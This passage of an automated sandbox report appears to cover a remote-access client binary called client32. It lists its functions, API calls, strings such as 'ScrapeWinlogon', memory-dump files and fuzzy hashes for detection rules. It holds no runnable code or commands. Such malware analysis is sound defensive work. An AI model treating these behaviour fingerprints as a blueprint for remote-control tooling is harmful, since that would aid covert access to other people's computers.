                                                        • SetEvent.KERNEL32(?,?,?,?,11043F5C,?,00000001), ref: 110AB0DA
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0E1
                                                        • LeaveCriticalSection.KERNEL32(00000028,?,?,?,11043F5C,?,00000001), ref: 110AB0F7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                        • String ID:
                                                        • API String ID: 3394196147-0
                                                        • Opcode ID: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
                                                        • Instruction ID: e0d87326b4d86e53b28e3cee19c451b2299f4d0e942967006842b7f646d6e484
                                                        • Opcode Fuzzy Hash: 8c47059aaa007ad8633e5d8c3be54e8c278fd32cc50d61e0effaef4322f575e5
                                                        • Instruction Fuzzy Hash: 020167335006549FD321A6A9E484BDBFBE8FB6B365F04852AF09BC6500D7B5A045C7A1
                                                        Function 110B5150 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110B5479
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Xinvalid_argument_freestd::_
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$vector<T> too long
                                                        • API String ID: 3009493112-1764033307
                                                        • Opcode ID: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
                                                        • Instruction ID: d3742dddefd9539a2c6faf75fa5aff6455038083edce66c72e6810edab36b23a
                                                        • Opcode Fuzzy Hash: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
                                                        • Instruction Fuzzy Hash: 39B1D979E0121A9BDF04CFA4CC80AEEB7B5EF88718F144669F915A7380DB71AD44CB94
                                                        Function 11049430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strncpy
                                                        • String ID: Client.
                                                        • API String ID: 2961919466-3668916897
                                                        • Opcode ID: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
                                                        • Instruction ID: 572398fb48615d3f05e5c1c88e4c2dd5f7b798ba22a18aad523c76445d718ab6
                                                        • Opcode Fuzzy Hash: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
                                                        • Instruction Fuzzy Hash: E24196B5D002499FDB50CF78C8C5BEABBF4AF49314F1441A9E918E7241EB35AA04CBA0
                                                        Function 110552B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick
                                                        • String ID: Stop reconn to %s
                                                        • API String ID: 536389180-2663412807
                                                        • Opcode ID: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
                                                        • Instruction ID: af3c01e96c1c7020b4005c014dfc046fba5e2fca3df96dde9e75da5347296435
                                                        • Opcode Fuzzy Hash: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
                                                        • Instruction Fuzzy Hash: 3B31A475E006059FD7A0CF78C880A9AB7F5AF89314F1086ADE85EC7285DB71E944CB50
                                                        Function 11037210 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strtok.LIBCMT ref: 11037232
                                                          • Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4
                                                        • _strtok.LIBCMT ref: 110372B3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
                                                        • String ID: ; >$CLTCONN.CPP
                                                        • API String ID: 3120919156-788487980
                                                        • Opcode ID: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
                                                        • Instruction ID: ccfc037b8357edf1224686589f5a8c743ae1842636507a1361757ab53c929d04
                                                        • Opcode Fuzzy Hash: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
                                                        • Instruction Fuzzy Hash: A621E76AE006477FDB02DEA99C40B9EB7D59F84215F0840A5FD489B341FA74AD0083E1
                                                        Function 11047220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 1104726D
                                                        • GetTickCount.KERNEL32 ref: 1104728F
                                                          • Part of subcall function 1103AE60: CloseHandle.KERNEL32(00000000,110AE050,00000001,00000000,?), ref: 1103AF02
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$CloseHandle
                                                        • String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true)
                                                        • API String ID: 3288320179-4162823169
                                                        • Opcode ID: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
                                                        • Instruction ID: dad7b6f7502343be31355568bd77ad9becd5e116beabebea3ed844355e2a9eb8
                                                        • Opcode Fuzzy Hash: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
                                                        • Instruction Fuzzy Hash: 7D213831F50B006BF612D73598867AAB7C5AF8071EF248439EE5B4A6C0CBA67480CB56
                                                        Function 1105F620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok
                                                        • String ID: ,=
                                                        • API String ID: 1675499619-2677018336
                                                        • Opcode ID: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
                                                        • Instruction ID: 7a9fbb2f34e7303a29542f3709b992e29d429b122d26399c990661d45cd0e722
                                                        • Opcode Fuzzy Hash: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
                                                        • Instruction Fuzzy Hash: BF110636B002562FE7C2DD788C10BC77BD59F09245F008098E948AB250E635E840C6B2
                                                        Function 1103D5C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D566
                                                          • Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D584
                                                          • Part of subcall function 1103D550: Sleep.KERNEL32(00000014), ref: 1103D597
                                                          • Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D5AF
                                                        • IsWindow.USER32(00000000), ref: 1103D5EA
                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103D5FD
                                                        Strings
                                                        • DoMMData - could not find %s window, xrefs: 1103D60D
                                                        • PCIVideoSlave32, xrefs: 1103D608
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Find$MessageSendSleep
                                                        • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                        • API String ID: 1010850397-3146847729
                                                        • Opcode ID: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
                                                        • Instruction ID: 40260b62f694b88d247e0099ba96be85712fa175176470c9008f94ddf9255897
                                                        • Opcode Fuzzy Hash: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
                                                        • Instruction Fuzzy Hash: BCF02773E512187BE700EF68BC06BDEBBA89B0130AF408194ED09A62C0F6B115114BD6
                                                        Function 11087400 Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11068B70: EnterCriticalSection.KERNEL32(?,82E0FB89,?,75A37CB0,75A37AA0), ref: 11068BD5
                                                          • Part of subcall function 11068B70: SetEvent.KERNEL32(?,?,00000000,11066D20,?,?), ref: 11068CB2
                                                        • CloseHandle.KERNEL32(00000000,00000001,000000C2,?,00000001,000000C1,?,00000001,000000C0,?,00000001,00000093,?,00000001,00000091,?), ref: 1108758A
                                                        • _free.LIBCMT ref: 110875AB
                                                        • CloseHandle.KERNEL32(?), ref: 110875E6
                                                        • FreeLibrary.KERNEL32(?), ref: 11087606
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CriticalEnterEventFreeLibrarySection_free
                                                        • String ID:
                                                        • API String ID: 3241181375-0
                                                        • Opcode ID: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
                                                        • Instruction ID: 769b914857c95559ccedf9963c302cb6770c9c9862fadc681d98dd4b5afd4e1e
                                                        • Opcode Fuzzy Hash: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
                                                        • Instruction Fuzzy Hash: 3851BDF8B807057AF95596704CA6FBE214E8BD4B4CF041016FA066E1C2CED7BE829325
                                                        Function 1113F700 Relevance: 6.2, APIs: 4, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1113F7F7
                                                        • __CxxThrowException@8.LIBCMT ref: 1113F80C
                                                        • std::exception::exception.LIBCMT ref: 1113F81B
                                                        • __CxxThrowException@8.LIBCMT ref: 1113F830
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                        • String ID:
                                                        • API String ID: 1651403513-0
                                                        • Opcode ID: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
                                                        • Instruction ID: 2aa7a213fe02530d6649da53b875432d464f8bc862cdc2c3c02bddd3af265e2f
                                                        • Opcode Fuzzy Hash: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
                                                        • Instruction Fuzzy Hash: F4514CB5900706AFC700CF9AC980A9AFBF8FF08714F50852EE55AA7740E774A654CF91
                                                        Function 11063210 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,?,?,?,?,82E0FB89,?,?,?,?,11170348,000000FF,?,110679FB,00000010), ref: 110632BA
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11063380
                                                          • Part of subcall function 111026C0: InterlockedDecrement.KERNEL32(?), ref: 111026C8
                                                        Strings
                                                        • EnumConn error, idata=%x, xrefs: 110633F6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                        • String ID: EnumConn error, idata=%x
                                                        • API String ID: 1807080765-705201588
                                                        • Opcode ID: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
                                                        • Instruction ID: aa17bf20ae77388aa0ec91c98647f03043a44d4666c3d031e6487ff34e196994
                                                        • Opcode Fuzzy Hash: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
                                                        • Instruction Fuzzy Hash: F551B075E087568FEB15CF55C580BAAF7F8FB45318F1086ADC85A8BB81CB31A805CB90
                                                        Function 110930B0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11092F20: std::_Xinvalid_argument.LIBCPMT ref: 11092F40
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FC7
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FEB
                                                        • std::exception::exception.LIBCMT ref: 11093126
                                                          • Part of subcall function 11150C1A: std::exception::_Copy_str.LIBCMT ref: 11150C35
                                                        • __CxxThrowException@8.LIBCMT ref: 1109313B
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093025
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093041
                                                        • std::exception::exception.LIBCMT ref: 110931C6
                                                        • __CxxThrowException@8.LIBCMT ref: 110931DB
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
